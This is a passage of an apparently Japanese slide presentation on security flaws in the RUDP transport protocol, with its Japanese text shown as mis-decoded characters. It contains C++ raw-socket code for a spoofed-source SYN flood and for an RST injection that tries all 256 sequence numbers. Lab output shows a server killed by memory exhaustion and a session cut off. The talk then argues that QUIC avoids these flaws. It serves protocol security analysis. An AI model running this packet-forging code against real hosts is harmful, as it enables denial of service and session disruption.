  udp_header->uh_ulen = htons( udp_header_size + rudp_header_size );
  auto rudp_header = std::next( buf.begin(), rudp_offset );
  std::copy( syn.begin(), syn.end(), rudp_header );
  udp_header->uh_sum = 0;
  std::copy( std::next( buf.begin(), udp_offset ), buf.end(),
  std::next( pseudo.begin(), pseudo_udp_offset ) );
  uint16_t c1 = checksum( pseudo.begin(), pseudo.end() );
  udp_header->uh_sum = htons( c1 );
  ip_header->id = htons( seq );
  ip_header->check = 0;
  uint16_t c0 = checksum( std::next( buf.begin(), ip_offset ), std::next(
  buf.begin(), ip_offset + ip_header_size ) );
  ip_header->check = htons( c0 );
  std::string message;
  if( write( sock, buf.data(), buf.size() ) < 0 ) {
  std::cout << strerror( errno ) << std::endl;
  ૹ৴ݩΛ࠮শ͠ͳ͕Β16777216ճSYN͢ΔίʔυΛ༻ҙ

  View Slide

 81. std::copy( syn.begin(), syn.end(), rudp_header );
  udp_header->uh_sum = 0;
  std::copy( std::next( buf.begin(), udp_offset ), buf.end(),
  std::next( pseudo.begin(), pseudo_udp_offset ) );
  uint16_t c1 = checksum( pseudo.begin(), pseudo.end() );
  udp_header->uh_sum = htons( c1 );
  ip_header->id = htons( seq );
  ip_header->check = 0;
  uint16_t c0 = checksum( std::next( buf.begin(), ip_offset ), std::next(
  buf.begin(), ip_offset + ip_header_size ) );
  ip_header->check = htons( c0 );
  std::string message;
  if( write( sock, buf.data(), buf.size() ) < 0 ) {
  std::cout << strerror( errno ) << std::endl;
  std::cout << "ૹ৴Ͱ͖ͳ͍ " << bind_result << std::endl;
  close( sock );
  return 1;
  }
  }
  ૹ৴ݩΛ࠮শ͠ͳ͕Β16777216ճSYN͢ΔίʔυΛ༻ҙ

  View Slide

 82. $ ./rudp_server
  ڧ੍ऴྃ
  $
  $ vmstat -n 1 -S M
  procs -----------memory---------- ---swap-- -----io---- -system-- ------cp
  r b swpd free inact active si so bi bo in cs us sy id
  0 0 466 851 0 28 0 0 4 0 369 365 3 3 95
  0 0 466 851 0 28 0 0 20 0 399 439 3 3 94
  0 0 466 851 0 28 0 0 104 107 496 540 3 4 93
  2 0 466 725 0 28 0 0 20 0 6913 2269 38 61 1
  2 0 466 611 0 28 0 0 12 40 6925 2029 38 62 0
  2 0 466 504 0 28 0 0 20 0 6727 2252 38 62 0
  2 0 466 384 0 28 0 0 8 0 7248 2095 39 61 0
  2 0 466 278 0 28 0 0 16 0 6744 2433 37 62 0
  3 0 466 153 0 28 0 0 20 0 7505 2278 40 60 0
  2 0 466 60 0 18 0 0 272 66 6681 1812 37 63 0
  1 4 478 48 0 12 0 11 4124 12745 6051 1882 15 52 3
  0 5 488 47 0 15 0 10 6236 11080 5687 2643 12 51 0
  3 4 500 47 0 16 0 11 1528 11372 6169 2145 10 43 0
  2 1 531 51 0 16 1 32 2836 33304 6200 3253 14 46 0
  4 2 602 56 0 12 3 74 5392 76376 10141 4716 18 53 1
  2 1 640 49 0 13 2 39 4332 40936 6296 4438 24 60 0
  2 1 672 53 0 13 1 34 1452 35072 6182 3755 17 59 1
  1 4 699 49 0 14 1 28 2996 30208 7093 4404 18 57 1
  2 1 745 50 0 13 2 48 2649 49592 6329 4452 23 61 2
  1 2 785 48 0 13 1 40 1784 41832 6214 3967 21 61 0
  2 1 828 48 0 13 1 45 1868 46144 6474 3697 19 55 2
  1 2 869 48 0 13 1 42 1624 43580 6412 4095 18 59 3
  2 1 905 47 0 13 1 38 2132 39000 6479 4594 20 57 4
  1 1 949 47 0 13 1 45 1884 46283 7102 4510 19 60 1
  1 4 953 51 0 11 0 5 56368 6305 6201 4887 13 56 2
  1 3 953 50 0 11 0 0 102552 260 5710 6775 12 59 0
  1 3 953 48 0 13 0 0 97716 176 5550 6547 12 59 0
  2 1 492 876 0 16 0 0 32632 1160 12142 5625 10 73 2
  ෺ੌ͍੎͍ͰϝϞϦΛফඅ
  # ./syn_flood
  [11509520.092388] Out of memory: Kill process 7358 (rudp_server) score 667
  or sacrifice child
  [11509520.092397] Killed process 7358 (rudp_server) total-vm:1408308kB,
  anon-rss:851668kB, file-rss:1628kB, shmem-rss:0kB
  [11509520.143321] oom_reaper: reaped process 7358 (rudp_server), now anon-
  rss:0kB, file-rss:0kB, shmem-rss:0kB
  ϝϞϦΛ࢖͍੾ͬͯ͠·ͬͨ
  DoS߈ܸ͕੒ཱͯ͠͠·͏
  ϋʔτϏʔτִؒ
  30ඵͷ৔߹

  View Slide

 83. RUDPʹ͓͚ΔSYN flood߈ܸ
  ϋʔτϏʔτͷ࠷େ௕Ͱ2௨ΓͷৼΔ෣͍Λ͢Δ
  ߈ܸऀ͸ϋʔτϏʔτΛૹΕͳ͍ҝ
  CPUΛ࢖͍੾Δ·ͰϝϞϦ֬อͱղ์Λ܁Γฦ͢
  ϋʔτϏʔτͷִ͕ؒ୹͍৔߹
  SYN
  SYN+ACK
  SYN
  SYN
  SYN
  ϝϞϦ֬อ
  SYN+ACK
  SYN+ACK
  SYN+ACK
  ϝϞϦղ์
  ϝϞϦ֬อ
  ϝϞϦղ์
  ϝϞϦ֬อ
  ϝϞϦղ์
  ϝϞϦ֬อ
  ϝϞϦղ์

  View Slide

 84. $ vmstat -n 1 -S M
  procs -----------memory---------- ---swap-- -----io---- -system-- ------cpu
  r b swpd free buff cache si so bi bo in cs us sy id
  3 0 62 813 0 90 0 0 1 12 0 1 0 0 99
  0 0 62 813 0 90 0 0 0 0 448 463 3 2 95
  1 0 62 813 0 90 0 0 0 0 353 373 2 1 97
  0 0 62 813 0 90 0 0 0 0 359 414 3 1 96
  2 0 62 773 0 90 0 0 0 0 1865 399 11 13 77
  2 0 62 667 0 90 0 0 0 0 10135 1846 38 62 0
  2 0 62 666 0 90 0 0 0 94 10317 1712 42 58 0
  2 0 62 664 0 90 0 0 0 0 11019 2083 42 58 0
  2 0 62 664 0 90 0 0 0 4 10214 2400 42 58 0
  2 0 62 664 0 90 0 0 0 0 10297 1790 41 59 0
  2 0 62 664 0 90 0 0 0 0 10681 2312 42 58 0
  2 0 62 664 0 90 0 0 0 0 9743 2057 41 58 0
  2 0 62 663 0 90 0 0 0 0 10996 2051 43 58 0
  3 0 62 664 0 90 0 0 0 0 10222 1598 43 57 0
  2 0 62 664 0 90 0 0 0 0 10392 2268 42 58 1
  2 0 62 664 0 90 0 0 4 0 10567 2362 42 58 0
  2 0 62 664 0 90 0 0 0 0 9931 2923 41 59 0
  2 0 62 664 0 90 0 0 0 0 11327 2306 43 56 0
  2 0 62 661 0 90 0 0 0 824 10346 2125 42 59 0
  2 0 62 661 0 90 0 0 0 0 10461 2037 42 58 0
  3 0 62 661 0 90 0 0 0 0 10076 2178 42 58 0
  2 0 62 661 0 90 0 0 0 0 10159 2546 42 58 0
  2 0 62 661 0 90 0 0 0 0 10399 2184 41 59 0
  2 0 62 661 0 90 0 0 0 0 10354 2583 42 58 0
  3 0 62 661 0 90 0 0 0 0 9855 1692 41 58 0
  2 0 62 661 0 90 0 0 4 0 11164 2219 43 57 0
  2 0 62 661 0 90 0 0 0 0 9582 2419 42 58 0
  2 0 62 661 0 90 0 0 0 0 11489 3095 43 56 0
  2 0 62 660 0 90 0 0 0 16 10210 2195 42 59 0
  ϝϞϦ͸֬อͨ͠୺͔Β
  ղ์͞Ε͍ͯΔͨΊ
  ࢖͍੾Βͳ͍
  $ ./rudp_client -H 192.168.2.1
  closed
  ͔͠͠CPU͕ߴෛՙͳঢ়گͰ
  ϋʔτϏʔτͷ଴͕ͪ࣌ؒ୹͍ͱλΠϜΞ΢τ͢Δҝ
  DoS߈ܸ͕੒ཱͯ͠͠·͏
  $ ./rudp_server
  # ./syn_flood
  ϋʔτϏʔτִؒ
  0.1ඵͷ৔߹

  View Slide

 85. RUDP͸
  SYN flood߈ܸʹରͯ͠੬ऑ

  View Slide

 86. γʔέϯε൪߸༧ଌ߈ܸ
  82ૹΔͰ
  82ݟͨͰ 83ૹΔͰ
  83ݟͨͰ
  ະ஌ͷγʔέϯε൪߸ʹ
  ର͢Δ֬ೝԠ౴Λແࢹ 83ૹΔͰ
  ड͚औΓࡁΈͷ
  σʔλΛແࢹ
  ѱҙ͋Δୈࡾऀ͕࣍ͷγʔέϯε൪߸Λ༧ଌͰ͖Δͱ
  ηογϣϯΛ৐ͬऔΒΕΔ

  View Slide

 87. TCPͷ৔߹
  32bit஋ͷͲΕ͔
  ݟͨͰ ద౰ͳ஋
  ࣍ͷૹΔͰ
  ਖ਼͘͠ͳ͍
  γʔέϯε൪߸Λແࢹ
  γʔέϯε൪߸ͷۭ͕ؒ޿͘ɺ஋΋࿈ଓ͠ͳ͍ҝ
  ਖ਼͍͠γʔέϯε൪߸ͷ༧ଌ͸ࠔ೉

  View Slide

 88. RUDPͷ৔߹
  8bit஋ͷͲΕ͔
  ݟͨͰ
  256௨Γͷ
  γʔέϯε൪߸
  ͲΕ͔Ұͭ͸
  ඞͣडཧ͞ΕΔ
  γʔέϯε൪߸ͷۭ͕ؒ8bit͔͠ͳ͍ͨΊ
  256௨Γͷγʔέϯε൪߸Λࢼͤ͹ͲΕ͔1ͭ͸௨Δ
  ݟͨͰ
  ະ஌ͷγʔέϯε൪߸ʹ
  ର͢Δ֬ೝԠ౴Λແࢹ ࣍ͷૹΔͰ ड͚औΓࡁΈͷ
  σʔλΛແࢹ

  View Slide

 89. auto ip_header =
  reinterpret_cast< iphdr* >( std::next( buf.data(), ip_offset ) );
  ip_header->version = 4;
  ip_header->ihl = 5;
  ip_header->tot_len = htons( ether_payload_size );
  ip_header->ttl = 0x40;
  ip_header->protocol = 0x11;
  ip_header->frag_off = htons( 0x02 << 13 );
  ip_header->saddr = htonl((192<<24)|(168<<16)|(2<<8)|2);
  ip_header->daddr = htonl((192<<24)|(168<<16)|(2<<8)|1);
  uint16_t c0 = checksum(
  std::next( buf.begin(), ip_offset ),
  std::next( buf.begin(), ip_offset + ip_header_size )
  );
  ip_header->check = htons( c0 );
  std::array< uint8_t, total_pseudo_packet_size > pseudo;
  std::fill( pseudo.begin(), pseudo.end(), 0 );
  auto pseudo_header = reinterpret_cast< pseudo_header_t*
  >( std::next( pseudo.data(), pseudo_ip_offset ) );
  pseudo_header->saddr = ip_header->saddr;
  pseudo_header->daddr = ip_header->daddr;

  View Slide

 90. pseudo_header->daddr = ip_header->daddr;
  pseudo_header->protocol = ip_header->protocol;
  pseudo_header->tot_len = htons( udp_header_size + rudp_header_size );
  auto udp_header =
  reinterpret_cast< udphdr* >( std::next( buf.data(), udp_offset ) );
  udp_header->uh_sport = htons( port );
  udp_header->uh_dport = htons( port );
  udp_header->uh_ulen = htons( udp_header_size + rudp_header_size );
  auto rudp_header = std::next( buf.begin(), rudp_offset );
  for( unsigned int seq = 0; seq != 256u; ++seq ) {
  rudp_header[ 0 ] = 0x50;
  rudp_header[ 1 ] = 0x06;
  rudp_header[ 2 ] = uint8_t( seq );
  rudp_header[ 3 ] = uint8_t( seq - 1 );
  karma::generate( std::next( rudp_header, 4 ), karma::big_word,
  0x0000 );
  uint16_t c2 = checksum( rudp_header, buf.end() );
  karma::generate( std::next( rudp_header, 4 ), karma::big_word, c2 );
  udp_header->uh_sum = 0;
  std::copy(
  std::next( buf.begin(), udp_offset ), buf.end(),
  RSTηάϝϯτΛγʔέϯε൪߸ΛΠϯΫϦϝϯτ͠ͳ͕Β256ճૹΔ

  View Slide

 91. std::copy(
  std::next( buf.begin(), udp_offset ), buf.end(),
  std::next( pseudo.begin(), pseudo_udp_offset )
  );
  uint16_t c1 = checksum( pseudo.begin(), pseudo.end() );
  udp_header->uh_sum = htons( c1 );
  ip_header->id = htons( seq );
  ip_header->check = 0;
  uint16_t c0 = checksum(
  std::next( buf.begin(), ip_offset ),
  std::next( buf.begin(), ip_offset + ip_header_size )
  );
  ip_header->check = htons( c0 );
  std::string message;
  if( write( sock, buf.data(), buf.size() ) < 0 ) {
  std::cout << strerror( errno ) << std::endl;
  std::cout << "ૹ৴Ͱ͖ͳ͍ " << bind_result << std::endl;
  close( sock );
  return 1;
  }
  }
  RSTηάϝϯτΛγʔέϯε൪߸ΛΠϯΫϦϝϯτ͠ͳ͕Β256ճૹΔ

  View Slide

 92. $ ./rudp_client -H 192.168.2.1
  connected
  sent
  received
  closed
  injection͕RSTΛڬΜͩࣄʹΑͬͯ
  RUDPαʔό͕ηογϣϯΛऴྃ͠
  RUDPΫϥΠΞϯτ͕௨৴ෆೳঢ়ଶΛݕ஌ͨ͠
  $ ./rudp_server
  received
  responded
  # ./injection

  View Slide

 93. RUDP͸
  γʔέϯε൪߸༧ଌ߈ܸʹରͯ͠੬ऑ

  View Slide

 94. RUDPΛ௒͑ͯ

  View Slide

 95. QUIC
  Google͕࡞ͬͨ
  21ੈلͷ৴པੑͷ͋ΔUDP
  https://tools.ietf.org/html/draft-tsvwg-quic-protocol-00
  ݱࡏIETFͰඪ४Խ͕ਐΊΒΕ͍ͯΔ
  ඪ४ԽͷաఔͰҰ෦࢓༷͕มΘͬͨҝ
  Googleͷ΋ͷΛ௨শgQUIC
  IETFͷ΋ͷΛ௨শiQUICͱݺͿ

  View Slide

 96. γʔέϯε൪߸0x??????FE
  γʔέϯε൪߸0x??????FF
  0x????0201·Ͱݟͨ
  QUICͷγʔέϯε൪߸
  γʔέϯε൪߸0x????0200
  γʔέϯε൪߸0x????0201
  γʔέϯε൪߸0x??????02
  64bitͷγʔέϯε൪߸ͷ͏ͪԼҐ8/16/32/48bit͚ͩΛૹΔ
  ط஌ͷγʔέϯε൪߸ͷ࠷େ஋Λ࢖ͬͯ࢒ΓͷܻΛิ׬͢Δ

  View Slide

 97. QUICͷγʔέϯε൪߸
  ैͬͯγʔέϯε൪߸ΛԼҐ8bitͰ΍ΓͱΓ͍ͯ͠Δ࣌ʹ
  256௨Γͷγʔέϯε൪߸Λࢼͤ͹ͲΕ͔͸౰ͨΔࣄʹͳΔ͕
  γʔέϯε൪߸0x??????FE
  γʔέϯε൪߸0x??????FF
  0x????0201·Ͱݟͨ
  γʔέϯε൪߸0x????0200
  γʔέϯε൪߸0x????0201
  γʔέϯε൪߸0x??????02

  View Slide

 98. ύϒϦοΫϑϥά γʔέϯε൪߸
  ҉߸Խ͞Εͨσʔλ
  0 16 32
  γʔέϯε൪߸8bitͰShort Header࢖༻͔ͭίωΫγϣϯIDলུ࣌
  QUICͷৄࡉͳϔομͱϖΠϩʔυ͸AEADͰ҉߸Խ͞Ε͍ͯΔ
  ύϒϦοΫϑϥάͱγʔέϯε൪߸͸
  ҉߸Խ͞Εͳ͍͕MACͷର৅ʹؚ·ΕΔ
  ηογϣϯ։࢝࣌ʹڞ༗ͨ͠伴Λ࣋ͨͳ͍ѱҙ͋Δୈࡾऀ͕
  γʔέϯε൪߸Λॻ͖׵͑ͨύέοτΛ࡞Δͱվ᜵͕ݕ஌͞ΕΔ

  View Slide

 99. QUICͷϋϯυγΣΠΫ
  ͜ͷԟ෮ͷؒʹTLSͷ伴ڞ༗΋ߦ͏
  ৗ࣌SYN cookieͷΑ͏ͳ෺ͳͷͰSYN flood߈ܸ͸༗ޮͰ͸ͳ͍
  ηογϣϯΛ։͍࢝ͨ͠
  ͜ͷτʔΫϯΛ࣋ͬͯ
  ग़௚͍ͯ͜͠
  ҉߸Խ͞Εͨ
  ηογϣϯʹඞཁͳ৘ใ
  ηογϣϯΛ։͍࢝ͨ͠
  ҉߸Խ͞Εͨ
  ηογϣϯʹඞཁͳ৘ใ ϝϞϦ֬อ

  View Slide

 100. QUIC͸
  RUDP๊͕͍͑ͯͨॾ໰୊Λղܾͨ͠
  ࠓ࠷΋༗๬ͳUDP্ͷ఻ૹ੍ޚϓϩτίϧͰ͋Δ

  View Slide

 101. ·ͱΊ
  RUDP͸UDP্ʹ࡞ΒΕͨ
  ఻ૹ੍ޚϓϩτίϧͰ͋Δ
  RUDPͷ࢓༷͸TCPͱൺֱͯ͠؆ૉͰ
  ϔομ΋TCPͱൺֱͯ͠খ͍͞
  RUDP͸TCPͰఆ൪ͷ߈ܸख๏ʹର͢ΔରࡦΛ͍͓ܽͯΓ
  ࢖༻͢΂͖Ͱ͸ͳ͍
  ಉ͡UDPͷ্ʹ࡞ΒΕͨ఻ૹ੍ޚϓϩτίϧͰ΋
  QUIC͸RUDPʹݟΒΕΔΑ͏ͳ໰୊Λ๊͍͑ͯͳ͍

  View Slide